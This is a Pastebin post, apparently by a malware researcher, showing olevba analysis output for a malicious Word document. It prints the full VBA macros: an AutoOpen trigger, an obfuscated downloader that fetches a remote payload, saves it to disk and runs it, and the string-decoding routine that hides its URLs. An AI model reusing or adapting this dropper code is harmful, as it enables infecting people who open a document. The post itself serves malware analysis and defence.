dynamoo

Malicious Word macro

Apr 2nd, 2015
345
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- 07623989.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 07623989.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 07623989.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. S6Wrk7025w4
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO dfsdfsdf.bas
  27. in file: 07623989.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Sub LZHGWIJZGNT()
  31.      MQtf7O h08Nt7g80a0OJNSxSH__54e("Ò¿¾ÊŠ‚z ƒxŽ‡ƒ¡y{ƒšƒz‰²Í|Ѿƒ‰»´¹Ý»xÄÀº", "jKJZPSKi"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚­ÀÍ", "akTTHHhq")
  32. End Sub
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. ANALYSIS:
  35. +------------+----------------+-----------------------------------------+
  36. | Type       | Keyword        | Description                             |
  37. +------------+----------------+-----------------------------------------+
  38. | Suspicious | Environ        | May read system environment variables   |
  39. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  40. |            |                | may be used to obfuscate strings        |
  41. |            |                | (option --decode to see all)            |
  42. +------------+----------------+-----------------------------------------+
  43. -------------------------------------------------------------------------------
  44. VBA MACRO sdfsdfggg.bas
  45. in file: 07623989.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean
  48.      Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte
  49.  
  50.     Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa"))
  51.     øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False
  52.     øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh")
  53.  
  54.     ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody
  55.  
  56.     ùÈÎÐâûàààà = FreeFile
  57.     Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
  58.     Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
  59.     Close #ùÈÎÐâûàààà
  60.    
  61.     Dim îðÈÃãèðââà
  62. Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL"))
  63. îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT")
  64.  
  65.      
  66.  
  67. End Function
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+----------------+-----------------------------------------+
  71. | Type       | Keyword        | Description                             |
  72. +------------+----------------+-----------------------------------------+
  73. | Suspicious | CreateObject   | May create an OLE object                |
  74. | Suspicious | Open           | May open a file                         |
  75. | Suspicious | Environ        | May read system environment variables   |
  76. | Suspicious | Put            | May write to a file (if combined with   |
  77. |            |                | Open)                                   |
  78. | Suspicious | Binary         | May read or write a binary file (if     |
  79. |            |                | combined with Open)                     |
  80. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  81. |            |                | may be used to obfuscate strings        |
  82. |            |                | (option --decode to see all)            |
  83. +------------+----------------+-----------------------------------------+
  84. -------------------------------------------------------------------------------
  85. VBA MACRO Module1.bas
  86. in file: 07623989.doc - OLE stream: u'Macros/VBA/Module1'
  87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  88.  
  89.  
  90. Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String)
  91. Dim D1WW3_661OJL03d46MkaCZS() As Byte
  92. Dim AF8S1() As Byte
  93. Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer
  94. jbUlyOYaUaoVg84 = 3444
  95. For iKuNclvIQNbaO15 = 0 To 97
  96. jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
  97. DoEvents
  98. Next iKuNclvIQNbaO15
  99.  
  100.  
  101. D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode)
  102. AF8S1 = StrConv(HQ07, vbFromUnicode)
  103. For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS)
  104. If i <= UBound(AF8S1) Then
  105. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i)
  106. Else
  107. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1))
  108. End If
  109. Next i
  110. h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode)
  111. End Function
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. ANALYSIS:
  114. No suspicious keyword or IOC found.
RAW Paste Data